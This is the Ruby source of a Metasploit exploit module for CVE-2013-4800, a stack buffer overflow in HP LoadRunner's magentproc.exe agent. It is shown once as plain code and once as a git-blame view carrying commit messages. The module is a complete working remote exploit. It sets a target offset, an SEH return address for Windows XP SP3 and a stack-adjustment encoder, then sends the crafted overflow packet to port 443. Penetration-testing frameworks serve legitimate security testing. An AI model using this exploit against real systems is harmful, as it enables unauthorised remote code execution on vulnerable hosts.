metasploit-framework/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'HP LoadRunner magentproc.exe Overflow',
      'Description'    => %q{
        This module exploits a stack buffer overflow in HP LoadRunner before 11.52. The
        vulnerability exists on the LoadRunner Agent Process magentproc.exe. By sending
        a specially crafted packet, an attacker may be able to execute arbitrary code.
      },
      'Author'         =>
        [
          'Unknown', # Original discovery # From Tenable Network Security
          'juan vazquez' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2013-4800'],
          ['OSVDB', '95644'],
          ['ZDI', '13-169']
        ],
      'Privileged'     => false,
      'DefaultOptions' =>
        {
          'SSL' => true,
          'SSLVersion' => 'SSL3',
          'PrependMigrate' => true
        },
      'Payload'        =>
        {
          'Space'    => 4096,
          'DisableNops' => true,
          'BadChars' => "\x00",
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
        },
      'Platform'       => 'win',
      'DefaultTarget'  => 0,
      'Targets'        =>
        [
          [
            'Windows XP SP3 / HP LoadRunner 11.50',
            {
              # magentproc.exe 11.50.2042.0
              'Offset' => 1104,
              'Ret' => 0x7ffc070e, # ppr # from NLS tables # Tested stable over Windows XP SP3 updates
              'Crash' => 6000 # Length needed to ensure an exception
            }
          ]
        ],
      'DisclosureDate' => 'Jul 27 2013'))

      register_options([Opt::RPORT(443)], self.class)
  end

  def exploit

    req = [0xffffffff].pack("N") # Fake Length
    req << rand_text(target['Offset'])
    req << generate_seh_record(target.ret)
    req << payload.encoded
    req << rand_text(target['Crash'])

    connect
    print_status("Sending malicious request...")
    sock.put(req)
    disconnect

  end
end
Add module for ZDI-13-169 2013-10-03 21:52:20 +00:00			`##`
Redo the boilerplate / splat [SeeRM #8496] 2013-10-15 18:50:46 +00:00			`# This module requires Metasploit: http//metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
Add module for ZDI-13-169 2013-10-03 21:52:20 +00:00			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Exploit::Remote`
			`Rank = NormalRanking`

			`include Msf::Exploit::Remote::Tcp`
			`include Msf::Exploit::Remote::Seh`

			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'HP LoadRunner magentproc.exe Overflow',`
			`'Description' => %q{`
			`This module exploits a stack buffer overflow in HP LoadRunner before 11.52. The`
			`vulnerability exists on the LoadRunner Agent Process magentproc.exe. By sending`
			`a specially crafted packet, an attacker may be able to execute arbitrary code.`
			`},`
			`'Author' =>`
			`[`
			`'Unknown', # Original discovery # From Tenable Network Security`
			`'juan vazquez' # Metasploit module`
			`],`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
			`['CVE', '2013-4800'],`
			`['OSVDB', '95644'],`
Update modules to use new ZDI reference 2013-10-21 20:07:07 +00:00			`['ZDI', '13-169']`
Add module for ZDI-13-169 2013-10-03 21:52:20 +00:00			`],`
			`'Privileged' => false,`
			`'DefaultOptions' =>`
			`{`
			`'SSL' => true,`
Improve reliability 2013-10-03 22:19:53 +00:00			`'SSLVersion' => 'SSL3',`
			`'PrependMigrate' => true`
Add module for ZDI-13-169 2013-10-03 21:52:20 +00:00			`},`
			`'Payload' =>`
			`{`
Improve reliability 2013-10-03 22:19:53 +00:00			`'Space' => 4096,`
			`'DisableNops' => true,`
			`'BadChars' => "\x00",`
			`'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500`
Add module for ZDI-13-169 2013-10-03 21:52:20 +00:00			`},`
			`'Platform' => 'win',`
			`'DefaultTarget' => 0,`
			`'Targets' =>`
			`[`
			`[`
			`'Windows XP SP3 / HP LoadRunner 11.50',`
			`{`
Put ready to pull request 2013-10-04 03:15:17 +00:00			`# magentproc.exe 11.50.2042.0`
Add module for ZDI-13-169 2013-10-03 21:52:20 +00:00			`'Offset' => 1104,`
			`'Ret' => 0x7ffc070e, # ppr # from NLS tables # Tested stable over Windows XP SP3 updates`
Improve reliability 2013-10-03 22:19:53 +00:00			`'Crash' => 6000 # Length needed to ensure an exception`
Add module for ZDI-13-169 2013-10-03 21:52:20 +00:00			`}`
			`]`
			`],`
			`'DisclosureDate' => 'Jul 27 2013'))`

			`register_options([Opt::RPORT(443)], self.class)`
			`end`

			`def exploit`

			`req = [0xffffffff].pack("N") # Fake Length`
			`req << rand_text(target['Offset'])`
			`req << generate_seh_record(target.ret)`
			`req << payload.encoded`
			`req << rand_text(target['Crash'])`

			`connect`
Improve reliability 2013-10-03 22:19:53 +00:00			`print_status("Sending malicious request...")`
Add module for ZDI-13-169 2013-10-03 21:52:20 +00:00			`sock.put(req)`
			`disconnect`

			`end`
			`end`